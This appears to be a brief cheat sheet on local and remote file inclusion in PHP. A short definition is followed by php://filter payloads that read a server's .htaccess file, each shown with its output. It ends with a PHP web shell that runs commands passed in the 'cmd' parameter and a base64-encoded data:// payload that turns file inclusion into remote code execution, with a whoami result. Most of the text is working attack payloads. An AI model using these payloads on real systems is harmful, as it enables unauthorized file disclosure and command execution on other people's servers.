RFI

File Inclusion and Path Traversal At a Glance File inclusion is the method for applications, and scripts, to include local or remote files during run-time. The vulnerability occurs when an application generates a path to executable code using an attacker-controlled variable, giving the attacker control over which file is executed. There are two different types. Local File Inclusion (LFI) where the application includes files on the current server. And Remote File Inclusion (RFI) where the application downloads and execute files from a remote server. 1 ...

Target File .htaccess Output with PHP String Filters No Filter Applied Output: Testing PHP Filter Payload: php://filter/convert.base64-encode/resource=.htaccess Output: VGVzdGluZyBQSFAgRmlsdGVy Payload: php://filter/string.rot13/resource=.htaccess Output: Grfgvat CUC Svygre Payload: php://filter/string.toupper/resource=.htaccess Output: TESTING PHP FILTER Payload: php://filter/string.tolower/resource=.htaccess Output: testing php filter Payload: php://filter/string.strip_tags/resource=.htaccess Output: Testing PHP Filter This filter remove any HTML or PHP tags from the file contents. PHP Payload: <?php system($_GET['cmd']); echo 'Shell done!'; ?> Payload for LIF to RCE: php://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+&cmd=whoami Output: www-data